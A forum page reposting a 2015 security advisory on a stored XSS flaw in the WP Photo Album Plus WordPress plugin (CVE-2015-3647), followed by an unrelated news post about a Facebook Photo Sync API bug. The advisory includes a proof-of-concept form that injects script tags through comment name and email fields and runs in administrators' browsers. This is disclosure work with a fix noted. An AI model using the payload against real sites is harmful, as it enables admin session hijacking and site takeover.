Search the Community

Advisory ID: HTB23257 Product: WP Photo Album Plus WordPress Plugin Vendor: J.N. Breetvelt Vulnerable Version(s): 6.1.2 and probably prior Tested Version: 6.1.2 Advisory Publication: April 29, 2015 [without technical details] Vendor Notification: April 29, 2015 Vendor Patch: April 29, 2015 Public Disclosure: May 20, 2015 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2015-3647 Risk Level: Medium CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered stored XSS vulnerability in WP Photo Album Plus WordPress plugin, which can be exploited to perform Cross-Site Scripting attacks against administrators of vulnerable WordPress installation. An attacker might be able to hijack administrator’s session and obtain full control over the vulnerable website. The vulnerability exists due to the absence of filtration of user-supplied input passed via the "comname" and "comemail" HTTP POST parameters to "/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" script when posting a comment. A remote attacker can post a specially crafted message containing malicious HTML or script code and execute it in administrator’s browser in context of the vulnerable website, when administrator views images or comments in administrative interface. A simple exploit below will store JS code in the WP database and display a JS popup window with "ImmuniWeb" word every time the administrator views comments or images: <form action="http://[host]/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" method="post" name="main"> <input type="hidden" name="action" value='wppa'> <input type="hidden" name="wppa-action" value='do-comment'> <input type="hidden" name="photo-id" value='2'> <input type="hidden" name="comment" value='1'> <input type="hidden" name="moccur" value='1'> <input type="hidden" name="comemail" value='"><script>alert(/ImmuniWeb/);</script>'> <input type="hidden" name="comname" value='"><script>alert(/ImmuniWeb/);</script>'> <input type="submit" id="btn"> </form> The code will be automatically executed, when the administrator visits one of the following pages: http://[host]/wp-admin/admin.php?page=wppa_manage_comments http://[host]/wp-admin/admin.php?page=wppa_moderate_photos ----------------------------------------------------------------------------------------------- Solution: Update to WP Photo Album Plus 6.1.3 More Information: https://wordpress.org/plugins/wp-photo-album-plus/changelog/ ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23257 - https://www.htbridge.com/advisory/HTB23257 - Stored Cross-Site Scripting (XSS) in WP Photo Album Plus WordPress Plugin. [2] WP Photo Album Plus WordPress plugin - https://wordpress.org/plugins/wp-photo-album-plus/ - This plugin is designed to easily manage and display your photos, photo albums, slideshows and videos in a single as well as in a network WP site. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Surs?: http://dl.packetstormsecurity.net/1505-exploits/wpphotoalbumplus612-xss.txt

If you have enabled automatic Facebook Photo Sync feature on your iPhone, iPad or Android devices, then Beware! Hackers can steal your personal photographs without your knowledge. In 2012, the social network giant introduced Facebook Photo Sync feature for iPhone, iPad and Android devices which, if opt-in, allows Facebook to automatically sync all your photos saved on your mobile device with your Facebook account. The photos that you have synced from your phone are automatically uploaded in the background to a private Facebook album, which is not visible to any of your Facebook friends or other Facebook users. However, you may can choose then to share photos from the album on your Facebook timeline or send them as a message to a friend. A bug bounty hunter, Laxman Muthiyah, discovered a critical flaw in the Facebook Photo Sync feature and Facebook API that could allow any third-party app to access your personal photos from the hidden Facebook Photo Sync album. It's something that reminds me of "The Fappenings" and "The Snappening" -- in which nude and personal photographs of top celebrities were leaked due to a security flaw in Apple's iCloud file storage service and unofficial Snapchat messaging service app, respectively. In a blog post published today, Laxman explained that the vulnerability resides in the privilege mechanism that which applications are allowed to access sync photos using vaultimages API. Technically, Synced private photo album should be accessible by only Facebook's official app, but the vulnerability allows any 3rd party apps to get permission to read your personal synced photos. Laxman previously disclosed a vulnerability in Facebook Graph API mechanism that allowed him to delete any photo album on Facebook owned by any user, any page or any group. HOW TO DISABLE AUTO-SYNC Though, Facebook has patched the vulnerability reported by Laxman and rewarded him with $10,000 under it’s bug bounty program, Facebook users are advised to turn off Facebook Photo Sync feature just to be on the safer side. In order to do so, just go to Facebook mobile app menu, scroll down and select Account > App Settings > Sync Photos, then Choose 'Don't sync my photos.' Source

// remove pls am incurcat categoria..